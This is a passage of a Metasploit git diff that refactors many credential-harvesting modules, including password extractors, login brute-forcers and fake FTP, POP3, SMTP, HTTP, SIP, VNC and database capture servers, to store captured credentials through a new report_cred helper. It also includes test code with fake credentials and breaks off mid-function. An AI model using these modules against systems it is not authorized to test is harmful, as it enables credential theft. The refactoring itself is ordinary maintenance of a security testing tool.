+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     begin
     print_status("Trying to get 'admin' user password ...")
@@ -62,13 +88,14 @@ class Metasploit3 < Msf::Auxiliary
     else
       admin_password = admin_password_matches[1];
       print_good("Password for user 'admin' is: #{admin_password}")
-      report_auth_info(
-          :host   => rhost,
-          :port   => rport,
-          :sname  => "ZyXEL GS1510-16",
-          :user   => 'admin',
-          :pass   => admin_password,
-          :active => true
+
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'ZyXEL GS1510-16',
+        user: 'admin',
+        password: admin_password,
+        proof: res.body
       )
     end
   rescue ::Rex::ConnectionError
diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
index 50c7d6d536..84979820e9 100644
--- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
@@ -88,6 +88,32 @@ class Metasploit3 < Msf::Auxiliary
     parse_configuration(config[:data])
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   private
 
   def little_endian?
@@ -200,16 +226,14 @@ class Metasploit3 < Msf::Auxiliary
     @credentials.each do |k,v|
       next unless v[:user] and v[:password]
       print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}")
-      auth = {
-          :host => rhost,
-          :port => rport,
-          :user => v[:user],
-          :pass => v[:password],
-          :type => 'password',
-          :source_type => "exploit",
-          :active => true
-      }
-      report_auth_info(auth)
+      report_cred(
+        ip: rhost,
+        port: rport,
+        user: v[:user],
+        password: v[:password],
+        service_name: 'sercomm',
+        proof: v.inspect
+      )
     end
 
   end
diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb
index f4a0fbdf1f..b4105840c2 100644
--- a/modules/auxiliary/admin/oracle/oracle_login.rb
+++ b/modules/auxiliary/admin/oracle/oracle_login.rb
@@ -36,6 +36,32 @@ class Metasploit3 < Msf::Auxiliary
 
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     return if not check_dependencies
 
@@ -56,13 +82,12 @@ class Metasploit3 < Msf::Auxiliary
           break
         end
       else
-        report_auth_info(
-            :host  => "#{datastore['RHOST']}",
-            :port  => "#{datastore['RPORT']}",
-            :sname => 'oracle',
-            :user  => "#{datastore['SID']}/#{datastore['DBUSER']}",
-            :pass  => "#{datastore['DBPASS']}",
-            :active => true
+        report_cred(
+          ip: datastore['RHOST'],
+          port: datastore['RPORT'],
+          service_name: 'oracle',
+          user: "#{datastore['SID']}/#{datastore['DBUSER']}",
+          password: datastore['DBPASS']
         )
         print_status("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}")
       end
diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index 705c8cea23..0a248e088f 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -79,7 +79,6 @@ class Metasploit3 < Msf::Auxiliary
     }.merge(service_data)
 
     login_data = {
-      last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::UNTRIED,
     }.merge(service_data)
diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb
index 1401bd5095..3374f18e32 100644
--- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb
+++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb
@@ -66,6 +66,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user='nxadmin', pass='nxadmin')
     vprint_status("Trying username:'#{user}' with password:'#{pass}'")
     headers = {
@@ -100,16 +127,14 @@ class Metasploit3 < Msf::Auxiliary
       if res.body =~ /LoginResponse.*success="1"/
         print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
 
-        report_hash = {
-          :host   => datastore['RHOST'],
-          :port   => datastore['RPORT'],
-          :sname  => 'nexpose',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'}
-
-        report_auth_info(report_hash)
+        report_cred(
+          ip: datastore['RHOST'],
+          port: datastore['RPORT'],
+          service_name: 'nexpose',
+          user: user,
+          password: pass,
+          proof: res.code.to_s
+        )
         return :next_user
       end
     end
diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
index 58f8312e95..032e2d2643 100644
--- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
@@ -101,22 +101,46 @@ class Metasploit3 < Msf::Auxiliary
     if res.code == 303
       print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
 
-      report_hash = {
-        :host   => datastore['RHOST'],
-        :port   => datastore['RPORT'],
-        :sname  => 'openvas-gsa',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'}
-
-      report_auth_info(report_hash)
+      report_cred(
+        ip: datastore['RHOST'],
+        port: datastore['RPORT'],
+        service_name: 'openvas-gsa',
+        user: user,
+        password: pass,
+        proof: res.code.to_s
+      )
       return :next_user
     end
     vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}'")
     return :skip_pass
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def msg
     "#{vhost}:#{rport} OpenVAS gsad -"
   end
diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
index 87f020318c..71804b7ea8 100644
--- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
@@ -60,6 +60,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user=nil,pass=nil)
     begin
       vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")
@@ -67,14 +94,13 @@ class Metasploit3 < Msf::Auxiliary
       omp_send(cmd,true) # send hello
       if @result =~ /<authenticate_response.*status="200"/is
         print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => 'openvas-omp',
-          :user => user,
-          :pass => pass,
-          :source_type => "user_supplied",
-          :active => true
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'openvas-omp',
+          user: user,
+          password: pass,
+          proof: @result
         )
         disconnect
         @connected = false
diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
index 1216e5a318..6d812d7295 100644
--- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
@@ -61,6 +61,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user=nil,pass=nil)
     begin
       otp_send("< OTP/1.0 >\n",true) # send hello
@@ -81,14 +108,13 @@ class Metasploit3 < Msf::Auxiliary
       otp_send("#{pass}\n",!@connected)
       if @result =~ /SERVER <|>.*<|> SERVER/is
         print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => 'openvas-otp',
-          :user => user,
-          :pass => pass,
-          :source_type => "user_supplied",
-          :active => true
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'openvas-otp',
+          user: user,
+          password: pass,
+          proof: @result
         )
         disconnect
         @connected = false
diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb
index 17e58cca86..f444d9c914 100644
--- a/modules/auxiliary/scanner/scada/koyo_login.rb
+++ b/modules/auxiliary/scanner/scada/koyo_login.rb
@@ -114,19 +114,45 @@ class Metasploit3 < Msf::Auxiliary
       next if not res
 
       print_good "#{rhost}:#{rport} - KOYO - Found passcode: #{passcode}"
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport.to_i,
-        :proto  => 'udp',
-        :user   => '',
-        :pass   => passcode, # NOTE: Human readable
-        :active => true
+      report_cred(
+        ip: rhost,
+        port: rport.to_i,
+        service_name: 'koyo',
+        user: '',
+        password: passcode,
+        proof: res
       )
       break
     end
 
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'udp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def crc16(buf, crc=0)
     buf.each_byte{|x| crc = ((crc << 8) ^ @@CCITT_16[( crc >> 8) ^ x]) & 0xffff }
     [crc].pack("v")
diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb
index 13443f123c..871b44c1bf 100644
--- a/modules/auxiliary/server/capture/drda.rb
+++ b/modules/auxiliary/server/capture/drda.rb
@@ -216,14 +216,13 @@ class Metasploit3 < Msf::Auxiliary
 
     if @state[c][:user] and @state[c][:pass]
       print_status("DRDA LOGIN #{@state[c][:name]} Database: #{@state[c][:database]}; #{@state[c][:user]} / #{@state[c][:pass]}")
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :port      => datastore['SRVPORT'],
-        :sname     => 'db2_client',
-        :user      => @state[c][:user],
-        :pass      => @state[c][:pass],
-        :source_type => "captured",
-        :active    => true
+      report_cred(
+        ip: @state[c][:ip],
+        port: datastore['SRVPORT'],
+        service_name: 'db2_client',
+        user: @state[c][:user],
+        password: @state[c][:pass],
+        proof: @state.inspect
       )
 
       params = []
@@ -238,6 +237,32 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_close(c)
     @state.delete(c)
   end
diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb
index 27c36ef9f6..4ff3781d45 100644
--- a/modules/auxiliary/server/capture/ftp.rb
+++ b/modules/auxiliary/server/capture/ftp.rb
@@ -51,6 +51,32 @@ class Metasploit3 < Msf::Auxiliary
     c.put "220 FTP Server Ready\r\n"
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_data(c)
     data = c.get_once
     return if not data
@@ -71,14 +97,13 @@ class Metasploit3 < Msf::Auxiliary
     if(cmd.upcase == "PASS")
       @state[c][:pass] = arg
 
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :port => datastore['SRVPORT'],
-        :sname     => 'ftp',
-        :user      => @state[c][:user],
-        :pass      => @state[c][:pass],
-        :source_type => "captured",
-        :active    => true
+      report_cred(
+        ip: @state[c][:ip],
+        port: datastore['SRVPORT'],
+        service_name: 'ftp',
+        user: @state[c][:user],
+        password: @state[c][:pass],
+        proof: arg
       )
 
       print_status("FTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb
index 42b16bc692..5aaf38f579 100644
--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@@ -58,19 +58,44 @@ class Metasploit3 < Msf::Auxiliary
     exploit
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_request_uri(cli, req)
     if(req['Authorization'] and req['Authorization'] =~ /basic/i)
       basic,auth = req['Authorization'].split(/\s+/)
       user,pass  = Rex::Text.decode_base64(auth).split(':', 2)
 
-      report_auth_info(
-        :host        => cli.peerhost,
-        :port        => datastore['SRVPORT'],
-        :sname       => 'HTTP',
-        :user        => user,
-        :pass        => pass,
-        :source_type => "captured",
-        :active      => true
+      report_cred(
+        ip: cli.peerhost,
+        port: datastore['SRVPORT'],
+        service_name: 'HTTP',
+        user: user,
+        password: pass,
+        proof: req['Authorization']
       )
 
       print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb
index 2a6b348efc..ec81648a73 100644
--- a/modules/auxiliary/server/capture/pop3.rb
+++ b/modules/auxiliary/server/capture/pop3.rb
@@ -56,6 +56,32 @@ class Metasploit3 < Msf::Auxiliary
     c.put "+OK\r\n"
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_data(c)
     data = c.get_once
     return if not data
@@ -71,14 +97,13 @@ class Metasploit3 < Msf::Auxiliary
     if(cmd.upcase == "PASS")
       @state[c][:pass] = arg
 
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :port      => @myport,
-        :sname     => 'pop3',
-        :user      => @state[c][:user],
-        :pass      => @state[c][:pass],
-        :source_type => "captured",
-        :active    => true
+      report_cred(
+        ip: @state[c][:ip],
+        port: @myport,
+        service_name: 'pop3',
+        user: @state[c][:user],
+        password: @state[c][:pass],
+        proof: arg
       )
       print_status("POP3 LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
       @state[c][:pass] = data.strip
diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb
index 2ba5857eff..83cd3e4dc0 100644
--- a/modules/auxiliary/server/capture/postgresql.rb
+++ b/modules/auxiliary/server/capture/postgresql.rb
@@ -42,6 +42,32 @@ class Metasploit3 < Msf::Auxiliary
     exploit()
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_connect(c)
     @state[c] = {
       :name    => "#{c.peerhost}:#{c.peerport}",
@@ -74,16 +100,13 @@ class Metasploit3 < Msf::Auxiliary
       # Password message
       data.slice!(0, 5).unpack("N")[0] # skip over length
       @state[c][:password] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
-      report_auth_info(
-        :host  => c.peerhost,
-        :port => datastore['SRVPORT'],
-        :sname => 'psql_client',
-        :user => @state[c][:username],
-        :pass => @state[c][:password],
-        :type => "PostgreSQL credentials",
-        :proof => @state[c][:database],
-        :source_type => "captured",
-        :active => true
+      report_cred(
+        ip: c.peerhost,
+        port: datastore['SRVPORT'],
+        service_name: 'psql_client',
+        user: @state[c][:username],
+        password: @state[c][:password],
+        proof: @state[c][:database]
       )
       print_status("PostgreSQL LOGIN #{@state[c][:name]} #{@state[c][:username]} / #{@state[c][:password]} / #{@state[c][:database]}")
       # send failure message
diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb
index 185ae0466d..9750a43e1b 100644
--- a/modules/auxiliary/server/capture/sip.rb
+++ b/modules/auxiliary/server/capture/sip.rb
@@ -104,6 +104,32 @@ class Metasploit3 < Msf::Auxiliary
     return addr
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     begin
       @port = datastore['SRVPORT'].to_i
@@ -141,16 +167,13 @@ class Metasploit3 < Msf::Auxiliary
             proof = "client: #{client_ip}; username: #{username}; nonce: #{datastore['NONCE']}; response: #{response}; algorithm: #{algorithm}"
             print_status("SIP LOGIN: #{proof}")
 
-            report_auth_info(
-              :host  => @requestor[:ip],
-              :port => @requestor[:port],
-              :sname => 'sip_client',
-              :user => username,
-              :pass => response + ":" + auth_tokens['nonce'] + ":" + algorithm,
-              :type => "sip_hash",
-              :proof => proof,
-              :source_type => "captured",
-              :active => true
+            report_cred(
+              ip: @requestor[:ip],
+              port: @requestor[:port],
+              service_name: 'sip_client',
+              user: username,
+              password: response + ":" + auth_tokens['nonce'] + ":" + algorithm,
+              proof: proof
             )
 
             if datastore['JOHNPWFILE']
diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb
index 7140aac85e..12769c29cb 100644
--- a/modules/auxiliary/server/capture/smtp.rb
+++ b/modules/auxiliary/server/capture/smtp.rb
@@ -118,14 +118,13 @@ class Metasploit3 < Msf::Auxiliary
 
       @state[c][:pass] = arg
 
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :port      => datastore['SRVPORT'],
-        :sname     => 'pop3',
-        :user      => @state[c][:user],
-        :pass      => @state[c][:pass],
-        :source_type => "captured",
-        :active    => true
+      report_cred(
+        ip: @state[c][:ip],
+        port: datastore['SRVPORT'],
+        service_name: 'pop3',
+        user: @state[c][:user],
+        password: @state[c][:pass],
+        proof: arg
       )
       print_status("SMTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
     end
@@ -135,6 +134,32 @@ class Metasploit3 < Msf::Auxiliary
 
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_close(c)
     @state.delete(c)
   end
diff --git a/modules/auxiliary/server/capture/vnc.rb b/modules/auxiliary/server/capture/vnc.rb
index 9987f56a54..adf634969d 100644
--- a/modules/auxiliary/server/capture/vnc.rb
+++ b/modules/auxiliary/server/capture/vnc.rb
@@ -61,6 +61,32 @@ class Metasploit3 < Msf::Auxiliary
     c.put "RFB 003.007\n"
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :nonreplayable_hash
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_data(c)
     data = c.get_once
     return if not data
@@ -91,16 +117,13 @@ class Metasploit3 < Msf::Auxiliary
       c.close
       print_status("#{peer} - Challenge: #{@challenge.unpack('H*')[0]}; Response: #{data.unpack('H*')[0]}")
       hash_line = "$vnc$*#{@state[c][:chall].unpack("H*")[0]}*#{data.unpack('H*')[0]}"
-      report_auth_info(
-        :host  => c.peerhost,
-        :port => datastore['SRVPORT'],
-        :sname => 'vnc_client',
-        :user => "",
-        :pass => hash_line,
-        :type => "vnc_hash",
-        :proof => hash_line,
-        :source_type => "captured",
-        :active => true
+      report_cred(
+        ip: c.peerhost,
+        port: datastore['SRVPORT'],
+        service_name: 'vnc_client',
+        user: '',
+        password: hash_line,
+        proof: hash_line
       )
 
       if(datastore['JOHNPWFILE'])
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
index 2206aa9b70..1149cf7a4f 100644
--- a/test/modules/auxiliary/test/report_auth_info.rb
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Auxiliary
 
   FAKE_IP   = '192.168.12.123'
   FAKE_PORT = 80
-  FAKE_USER = 'username'
+  FAKE_USER = 'user'
   FAKE_PASS = 'password'
 
   def initialize(info = {})
@@ -123,6 +123,269 @@ class Metasploit3 < Msf::Auxiliary
     mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
   end
 
+  def test_hp_imc_som_create_account
+    mod = framework.auxiliary.create('admin/hp/hp_imc_som_create_account')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'https',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_dlink_dir_645_password_extractor
+    mod = framework.auxiliary.create('admin/http/dlink_dir_645_password_extractor')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'http',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_dlink_dsl320b_password_extractor
+    mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'http',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_nexpose_xxe_file_read
+    mod = framework.auxiliary.create('admin/http/nexpose_xxe_file_read')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'http',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_vbulletin_upgrade_admin
+    mod = framework.auxiliary.create('admin/http/vbulletin_upgrade_admin')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'http',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_wp_custom_contact_forms
+    mod = framework.auxiliary.create('admin/http/wp_custom_contact_forms')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      service_name: 'WordPress',
+      proof: ''
+    )
+  end
+
+  def test_zyxel_admin_password_extractor
+    mod = framework.auxiliary.create('admin/http/zyxel_admin_password_extractor')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'ZyXEL GS1510-16',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_sercomm_dump_config
+    mod = framework.auxiliary.create('admin/misc/sercomm_dump_config')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      service_name: 'sercomm',
+      proof: ''
+    )
+  end
+
+  def test_vnc
+    mod = framework.auxiliary.create('server/capture/vnc')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'vnc_client',
+      user: '',
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_smtp
+    mod = framework.auxiliary.create('server/capture/smtp')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'pop3',
+      user: FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_sip
+    mod = framework.auxiliary.create('server/capture/sip')
+    mod.report_cred(
+      ip: FAKE_IP,
+      port: FAKE_PORT,
+      service_name: 'sip_client',
+      user:FAKE_USER,
+      password: FAKE_PASS,
+      proof: ''
+    )
+  end
+
+  def test_oracle_login
+    mod = framework.auxiliary.create('admin/oracle/oracle_login')
+    mod.report_cred(
+      ip: FAKE_IP,
